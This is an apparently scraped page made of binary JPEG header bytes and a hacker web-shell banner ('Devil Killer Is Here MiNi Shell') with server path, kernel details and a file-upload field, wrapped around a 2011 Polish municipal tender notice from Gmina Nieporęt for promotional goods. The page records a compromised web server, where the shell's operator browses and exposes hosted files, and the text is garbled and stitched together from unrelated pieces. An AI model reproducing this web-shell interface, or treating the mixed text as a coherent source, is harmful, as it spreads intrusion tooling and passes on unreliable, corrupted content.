JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110412/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110412/75160-N-2011.html

<p class="kh_header"><b>Nieporęt: Wykonanie materiałów promocyjnych dla Urzędu Gminy Nieporęt w 2011 roku.</b><br>
<b>Numer ogłoszenia: 75160 - 2011; data zamieszczenia: 12.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nieporęt reprezentowana przez Wójta , Pl. Wolności 1, 05-126 Nieporęt, woj. mazowieckie, tel. 022 7670416, 7670442, faks 022 7670441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nieporet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie materiałów promocyjnych dla Urzędu Gminy Nieporęt w 2011 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Kod ze Wspólnego Słownika Zamówień (CPV):
79342200-5 - Usługi w zakresie promocji
2.Zamówienie obejmuje wykonanie i dostawę materiałów promocyjnych dla Urzędu Gminy Nieporęt w 2011 roku, w tym:

1.
Kapelusz 
turystyczny
Kapelusz turystyczny wykonany z materiału 100% bawełny
Kolor : żółty, biały
Nadruk - 1 kolor
Znakowanie:  logotyp D
Ilość sztuk 300
2.
Brelok
plastikowy
Brelok plastikowy pływający w kształcie elipsy
Materiał: PU, kolor: żółty i niebieski
Wymiary: 80x20x36mm
Nadruk - 1 kolor
Znakowanie:  logotyp D
Ilość sztuk 200
3.
Torba
plażowa
Torba plażowa z zamkiem błyskawicznym do przedniej, głównej i wewnętrznej kieszeni, z długimi uchwytami do noszenia. Kolory granatowy, biały i czerwony.
Materiał: poliester 600D/300D
Wymiary: 47x35x13 cm
Nadruk: 1 kolor
Znakowanie: logotyp D 
Ilość sztuk 50
4.
Mata
plażowa
Mata plażowa składa się w torbę z uszkami, zawiera nadmuchiwaną poduszkę
Kolor: w paski granatowo-białe
Wymiary:180x87cm
Nadruk - transfer  kolor
Znakowanie: logotyp B
Ilość sztuk 100
5.
Piłka 
plażowa
Piłka plażowa granatowa z białymi paskami
Materiał PVC,  wymiary :o 26 cm
Nadruk: 1 kolor
Znakowanie:  logotyp B
Ilość sztuk 200
6.
Poduszka
plażowa
Poduszka plażowa prostokątna z dwoma nadmuchiwanymi komorami.
Materiał: PCV, wymiary: 30,5x20,5x7cm
Kolor żółty i niebieski
Nadruk: 1 kolor
Znakowanie: logotyp C lub  logotyp D
Ilość sztuk 200
7.
Etui
wodoodporne
Etui wodoodporne zamykane na dwa zatrzaski,  z białym sznureczkiem-możliwość zawieszenia na szyję.
Materiał: PCV , kolor błękitny, wymiary: 240x152 mm,  nadruk 1 kolor
Znakowanie:  logotyp B 
Ilość sztuk 150
8.
Koc piknikowy 
Koc piknikowy wykonany z miękkiej włóczki z żółtym wykończeniem i uchwytem do niesienia.
Kolor granatowy.
Wymiar koca: 180x120 cm
Nadruk transfer
Znakowanie:  logotyp B
Ilość sztuk 50
9.
Badminton
Zestaw do gry w badminton zapakowany w transparentne etui, z paskiem na ramię zawierający 2 lotki.
 Paletka w kolorze niebieskim  z białą siatką.
Wymiary: 65x22x2,5 cm
Nadruk 1 kolor
Znakowanie:  logotyp B
Ilość sztuk 50
10.
Torba
izotermiczna
Torba izotermiczna z uchwytem do noszenia zawiera miejsce na 6 puszek 0,25l lub małych butelek.
Kolor niebieski, wymiary: 20,5x13,5,17cm
Nadruk 1 kolor
Znakowanie:  logotyp B
Ilość sztuk 120
11.
Składana torba
ekologiczna
Torba ekologiczna składana na zamek błyskawiczny, krótkie uchwyty
Kolor niebieski, materiał: polipropylen 80g, wymiary:395x395mm
Nadruk 1 kolor
Znakowanie:   logotyp C
Ilość sztuk 250
12. 
Miara
dwumetrowa
Miara dwumetrowa w kolorze czarno-żółtym zawierająca notatnik, ołówek, poziomicę
Wymiary: 7,9x6x2,4 cm, 
Nadruk 1 kolor
Znakowanie: logotyp B
Ilość sztuk 100
13.
Brelok plastikowy z plastikowym żetonem
Brelok z żetonem w kolorze granatowo-żółtym z metalowym kółeczkiem
Wymiary: 6x2,5cm
Nadruk : grafika w pełnym kolorze
Znakowanie: grafika promująca gminę Nieporęt, projekt graficzny Zamawiającego
Ilość sztuk 500
14.
Długopis 
Długopis metalowy w kolorze niebieskim z dodatkami srebrnymi
Wymiary: 134x8mm, nadruk - grawer
Znakowanie:  logotyp B
Ilość sztuk 500
15.
Długopis 
Długopis w kolorze niebieskim z klipem w kształcie łukowatym. Klips srebrny matowy, korpus długopisu z dodatkami srebrnymi błyszczącymi
Wymiar : 14,5x1
Znakowanie: logotyp B
Ilość sztuk 500
16.
Zapach
samochodowy
Zapach samochodowy w kształcie jabłka w opakowaniu foliowym, plastikowy zaczep, wymiary: 7,5x7cm
Nadruk - cmyk
Znakowanie:  grafika promująca gminę Nieporęt, projekt graficzny Zamawiającego
Ilość sztuk 1000
17. 
Układanka 
Układanka z plastiku z 15 elementami przesuwanymi
Wymiary:9x7,5cm, nadruk - 2 kolory
Znakowanie:  logotyp A
Ilość sztuk 200
18.
Brelok 
maskotka
Brelok maskotka z kółeczkiem - królik w koszulce odblaskowej
Bez nadruku
Ilość sztuk 250
19.
Worek szkolny
Worek szkolny w kolorze żółtym z odblaskowym paskiem.  Posiada dwa sznureczki z możliwością założenia na plecy.
Wymiary: 39,5x34cm, nadruk 1 kolor
Znakowanie: logotyp B
Ilość sztuk 300
20.
Bańki
mydlane
Długopis z możliwością puszczania baniek mydlanych, na sznureczku- możliwość zawieszenia na szyję, kolor granatowo-błękitny, wymiary: 16x3,5x1,6cm
Nadruk 1 kolor
Znakowanie:  logotyp B
Ilość sztuk 250
21.
Kredki w
pudełku z linijką
6 kredek w drewnianym pudełku z linijką
Wymiary: 20,5x4,2x2,3cm, nadruk - 1 kolor
Znakowanie:  logotyp C
Ilość sztuk 200
22.
Ołówek drewniany 
z główką
Ołówek drewniany kolorowy w czterech rodzajach niebieski, czerwony, zielony, żółty. Główka ołówka zawiera uśmiechniętą buźkę.
Wymiary: 21x2xo0,7cm, nadruk 1 kolor
Znakowanie: logotyp C
Ilość sztuk 500
23.
Worek żeglarski
Worek marynarski z boczną kieszenią dolną zamykaną, główna kieszeń wiązana na sznurek, worek z  dwoma wzmocnionymi uchwytami i regulowanym paskiem na zamek
Kolor: biało-niebieski,  materiał: poliester 600D, wymiary:o33x58cm, nadruk transfer
Znakowanie:  logotyp D
Ilość sztuk 100
24.
Kosmetyczka 
Kosmetyczka zawiera 6 kieszonek wewnątrz z dwoma równoległymi zamkami na górze zewnątrz, dodatkowe zamknięcie na rzep.
Kolor czerwono- granatowy- biały
Wymiar: 2716x14,5cm, nadruk transfer
Znakowanie: logotyp B
Ilość sztuk 100
25.
USB 4GB
USB metalowe 4 GB w kolorze srebrnym, w pudełku ozdobnym. Pudełko otwierane od góry na dwa boki, zamykane na magnes w kolorze grafitowym, wycięte wnętrze gąbki pod wymiar USB ok. 51x20x10 mm. Wymiary pudełka: 9 x 11x 3,5 cm otwierane z dwóch stron, kolor stalowy. 
Nadruk - grawer
Znakowanie:  logotyp D
Ilość sztuk 100
26.
Parasol
automatyczny
Parasol automatyczny z rączką skóropodobną, 
Kolory : brązowy z jasnym obrzeżem 
Materiał: nylon 190T,  wymiary : 120X80cm,
Nadruk 1 kolor
Znakowanie:  logotyp B
Ilość sztuk 100
27.
T-shirt męski
Koszulka 180g w kolorze białym, 
taśma wzmacniająca na karku i ramionach
Skład :80% bawełny, 15% wiskozy
Nadruk 2 kolory
Znakowanie:  logotyp A
Ilość sztuk 100
28.
T-shirt damski
Koszulka 205g w kolorze białym, skład: 100% bawełna, nadruk 2 kolory
Znakowanie:   logotyp A
Ilość sztuk 100
29.
Długopis metalowy
Długopis metalowy przekręcany w etui transparentnym. Powłoka długopisu koloru bordowego - matowa z dodatkami srebrno-czarnymi.
Wymiary: 14cmxo1,2cm, nadruk grawer
Znakowanie:    logotyp B
Ilość sztuk 100
30.
Torba papierowa
Papier eko prążek granatowy 100g. Uszka skręcane papierowe,dodatkowo wzmocnione 
rozmiar 31x12x wys. 41 cm 
Znakowanie: logotyp B
Ilość sztuk 200
31.
Torba papierowa
Papier eko prążek granatowy 100g. Uszka skręcane papierowe,dodatkowo wzmocnione 
rozmiar 25x11x32 
Ilość sztuk 200
32.
Torba na ramię
Torba z transparentną kieszenią na froncie, przeznaczoną na reklamę, zamknięcie na rzep, regulowany pasek na ramię. Kolor torby niebiesko-szary
Materiał poliester 600D/PVC
Znakowanie: logotyp B
Ilość sztuk 80
33.
Kalendarz 
książkowy
Kalendarz książkowy wysokiej klasy w oprawie skóropodobnej. Kalendarz tygodniowy 197x265mm, 144 strony jeden tydzień na dwóch stronach, kalendarium PL,GB,DF,RUS, imieniny i święta, kapitułka w kolorze szarym, perforacja narożna, zakładka w kolorze czerwonym, wszyty zeszyt teleadresowy, obszerna część informacyjna, mapa administracyjna Polski, kalendarz ma zawierać indywidualną wklejkę promocyjną składającą się z 4-ech stron, Papier biały, nadruk dwukolorowy szaro -bordowy
Znakowanie:  logo Nieporęt
Ilość sztuk 150
34.
Kalendarz 
ścienny
Kalendarz ścienny wraz z przygotowaniem projektu na podstawie przesłanych materiałów przez UG (format A4) - format A2, okładka kalendarza kreda 250g lakierowana jednostronnie - lakier UV, środek kalendarza - kreda 170g - 13 stron, Nadruk - cmyk
Znakowanie:   logotyp A
Ilość sztuk 300.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zlecenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, max do wartości 50% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca  musi wykazać się, że w ciągu ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej jedno zamówienie polegające na przygotowaniu materiałów promocyjnych zgodnie z projektem/wzorem zamawiającego, odpowiadające przedmiotowi zamówienia, na które składają ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)w celu potwierdzenia, że oferowane dostawy i usługi odpowiadają wymaganiom okresowym w SIWZ - próbki każdego z rodzajów materiałów promocyjnych. Próbki, Egzemplarze okazowe mogą zostać zwrócone wykonawcom na ich wniosek po zakończeniu procedury na zasadach przewidzianych w art. 97 ust 2 ustawy Prawo zamówień publicznych;
b)oświadczenie, które części zamówienia Wykonawca zamierza zlecić podwykonawcom,  złożone według wzoru określonego w załączniku nr 6 do SIWZ;
c)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
2.Konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy zamawiającym a inną niż wykonawca stroną.
3.W przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy zamawiający dopuszcza możliwość zmiany terminu realizacji przedmiotu zamówienia, o ile okoliczności te skutkują brakiem możliwości wykonania zamówienia w terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nieporet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nieporęt
Pl. Wolności 1
05-126 Nieporęt, Dział Promocji i Informacji Publicznej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2011 godzina 08:45, miejsce: Urząd Gminy Nieporęt
Pl. Wolności 1
05-126 Nieporęt.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com